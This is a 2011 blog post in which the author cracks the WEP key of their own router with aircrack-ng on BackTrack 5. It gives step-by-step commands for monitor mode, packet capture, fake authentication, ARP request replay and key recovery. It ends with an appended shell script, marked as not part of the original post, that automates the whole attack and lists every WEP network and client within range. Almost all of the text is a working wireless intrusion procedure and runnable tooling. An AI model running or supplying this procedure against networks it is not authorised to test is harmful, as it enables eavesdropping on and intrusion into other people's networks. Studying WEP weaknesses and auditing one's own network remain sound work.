Monday, December 12, 2011

False Sense of Security Using WEP Encryption

A couple of weeks ago, I accidentally stumbled upon BackTrack Linux (http://www.backtrack-linux.org/).  By following the how-to tutorial, I successfully installed BackTrack 5 on a persistent USB thumb drive (http://www.infosecramblings.com/backtrack/backtrack-4-usbpersistent-changesnessus/).  The logical thing to do after that was to try out the different tools they offer.  The following is the write-up of my attempt to crack my own network, which is secured by basic WEP encryption.  My test concluded that I was able to decrypt the key used to SECURE my router in no time at all.  I think it is about time I upgraded my network security to WPA2.

The cracking program I used is called aircrack-ng, which consists of a set of tools for auditing wireless networks.  I used a total of 3 separate terminal sessions simultaneously to crack the WEP encryption key.

Terminal Session #1

     1.  First, check the status of your network interfaces, both wired and
          wireless, by typing the following command:

          ifconfig

     2.  Alternatively, if you are only interested in the wireless interface,
          you can use:

          airmon-ng

          Pay special attention to whether your card shows up as wlan0 or wlan1.
          For the purpose of this discussion, we will use wlan0.

     3.  Next we put wlan0 into monitor mode:

          airmon-ng start wlan0

          airmon-ng prints the name of the monitor interface it created (mon0 on
          BackTrack 5); that is the interface every command below uses.

     4.  Then we start scanning for the networks in our neighbourhood:

          airodump-ng mon0

          Let it run for about a minute, then stop it with CTRL+C.

     5.  From the output of step 4, identify the wireless network with WEP
          encryption (the ENC column shows WEP) that belongs to you and write
          down the following information:
          - channel (CH column)
          - BSSID (the MAC address of the access point)
          - ESSID (the network name)
          - station (the MAC address of a client associated with that BSSID,
            listed in the lower part of the output). The ARP request replay in
            step 8 needs an associated client that sends ARP traffic; with no
            client on the network the capture will not speed up.

     6.  Start capturing the data packets of your network into a file to be
          fed into the cracking program:

          airodump-ng -c xx -w wepcrack --bssid xx:xx:xx:xx:xx:xx mon0

          (Note: -c = channel, -w = prefix of the output files; the capture is
          written to wepcrack-01.cap in the current directory)

          Wait for a minute and make sure the PWR and Beacons values keep
          changing.  The #Data column counts the captured data packets, each
          carrying one WEP initialisation vector (IV), and that count is what
          the crack depends on.  Around 15,000 are often enough for a 40-bit
          key; a 104-bit key usually needs several times that, so leave the
          capture running until aircrack-ng succeeds in step 9.

Terminal Session #2

     7.  To speed up the capturing process, start a 2nd terminal session
          while the 1st terminal is still running and type the following
          command:

          aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -e xxxxx mon0

          (Note: -1 = fake authentication with the AP; the 0 that follows is the
                      delay in seconds between re-association attempts, so 0
                      means authenticate once; -a = BSSID, -e = ESSID)

          Fake authentication associates our own card with the access point so
          that it accepts the frames we inject in the next step.  It does not
          deauthenticate anything.

     8.  Once aireplay-ng reports "Association successful :-)", start the
          standard ARP request replay as follows:

          aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -e xxxxx mon0

          (Note: -3 = standard ARP request replay, -b = BSSID, -e = ESSID)

          aireplay-ng waits for an ARP request from a client on the network and
          then replays it to the AP over and over; every reply is a fresh data
          packet with a new IV.  After a short while the #Data counter in
          terminal session 1 starts climbing at an accelerated rate, and
          reaching our target of 15,000 takes no time at all.

Terminal Session #3

     9.  Once we have enough data packets (> 15,000) captured, start the
          cracking process in a 3rd terminal session while terminal sessions
          1 & 2 are still running, by typing the following command:

          aircrack-ng wepcrack*.cap

          aircrack-ng reads the IVs from the capture and reports the key as
          "KEY FOUND! [ xx:xx:xx:xx:xx ]".  If the capture contains more than
          one network, add -b xx:xx:xx:xx:xx:xx to select yours.  If there are
          not enough IVs yet, it says so and retries automatically as the
          capture file grows, so keep sessions 1 and 2 running.
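The three-terminal procedure above, collected into one script, as an added example that is not part of the original post.  It assumes the same tool invocations as steps 3 to 9, the interface names wlan0 and mon0 and the output prefix wepcrack from the post, and that airodump-ng writes its default CSV summary (wepcrack-01.csv) next to wepcrack-01.cap with the 15-column "BSSID, ..., # IV, ..., ESSID, Key" table followed by the "Station MAC, ..." table.  Parsing that CSV lets the script pick out the WEP network, list the clients associated with it (the "station" from step 5) and wait for the IV count instead of watching the #Data column by hand.  The sample CSV at the bottom is constructed for offline testing and is not a real capture; crack_wep itself has to run as root on a box with aircrack-ng installed.

```shell
#!/bin/sh
# Added example: drives the aircrack-ng WEP procedure from the CSV summary that
# airodump-ng keeps updating beside its .cap file.  Not the post's own code.
# Assumed CSV layout: AP table with "# IV" in column 11 and ESSID in column 14,
# a blank line, then a station table with the associated BSSID in column 6.

# Print every access point in the CSV that advertises WEP:
# BSSID <TAB> channel <TAB> captured IVs <TAB> ESSID
wep_targets() {
    awk -F', *' '
        /^Station MAC/ { exit }                   # client table starts here
        $6 == "WEP" && length($1) == 17 {         # col 6 = Privacy, col 1 = BSSID
            sub(/\r$/, "", $14)
            printf "%s\t%s\t%s\t%s\n", $1, $4, $11, $14
        }' "$1"
}

# Print the "# IV" count (column 11) recorded for one BSSID, or 0 if unknown.
iv_count() {
    awk -F', *' -v bssid="$2" '
        /^Station MAC/ { exit }
        toupper($1) == toupper(bssid) { print $11; found = 1; exit }
        END { if (!found) print 0 }' "$1"
}

# Print the MACs of clients airodump-ng saw associated with a BSSID (column 6
# of the station table); ARP request replay needs at least one of these.
associated_stations() {
    awk -F', *' -v bssid="$2" '
        /^Station MAC/ { in_stations = 1; next }
        in_stations && toupper($6) == toupper(bssid) { print $1 }' "$1"
}

# Succeed once the capture holds at least $3 IVs for BSSID $2.
have_enough_ivs() {
    [ "$(iv_count "$1" "$2")" -ge "$3" ]
}

# Steps 3 to 9 of the post, end to end.  Must run as root; interface names,
# output prefix and the 15,000 IV default are taken from the post.
#   crack_wep <channel> <bssid> <essid> [iv-threshold]
crack_wep() {
    ch=$1; bssid=$2; essid=$3; need=${4:-15000}
    airmon-ng start wlan0 >/dev/null                    # step 3: creates mon0
    airodump-ng -c "$ch" -w wepcrack --bssid "$bssid" mon0 >/dev/null 2>&1 &
    dump=$!                                             # step 6: wepcrack-01.*
    sleep 5
    aireplay-ng -1 0 -a "$bssid" -e "$essid" mon0       # step 7: fake auth
    aireplay-ng -3 -b "$bssid" -e "$essid" mon0 >/dev/null 2>&1 &
    replay=$!                                           # step 8: ARP replay
    until have_enough_ivs wepcrack-01.csv "$bssid" "$need"; do
        printf 'IVs so far: %s\n' "$(iv_count wepcrack-01.csv "$bssid")"
        sleep 10
    done
    aircrack-ng -b "$bssid" wepcrack-01.cap             # step 9
    kill "$replay" "$dump"
}

# Constructed airodump-ng CSV for offline testing (not a real capture);
# prints the path of the temporary file it wrote.
sample_csv() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2011-12-12 20:01:03, 2011-12-12 20:05:40,  6,  54, WEP, WEP, OPN, -41,      212,     16432,   0.  0.  0.  0,   7, homewep, 
66:77:88:99:AA:BB, 2011-12-12 20:01:05, 2011-12-12 20:05:41, 11,  54, WPA2, CCMP, PSK, -60,      180,         0,   0.  0.  0.  0,   9, neighbour, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2011-12-12 20:01:10, 2011-12-12 20:05:39, -50,     3120, 00:11:22:33:44:55, homewep
AA:BB:CC:DD:EE:02, 2011-12-12 20:02:00, 2011-12-12 20:04:00, -70,       12, (not associated), neighbour
EOF
    printf '%s\n' "$f"
}
```

From a root shell, `crack_wep 6 00:11:22:33:44:55 homewep` runs the whole sequence against the network from step 5; `wep_targets wepcrack-01.csv` and `associated_stations wepcrack-01.csv <bssid>` can be run on their own against the CSV of any capture to check that the target really advertises WEP and has a client to replay from before injection is started.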

         
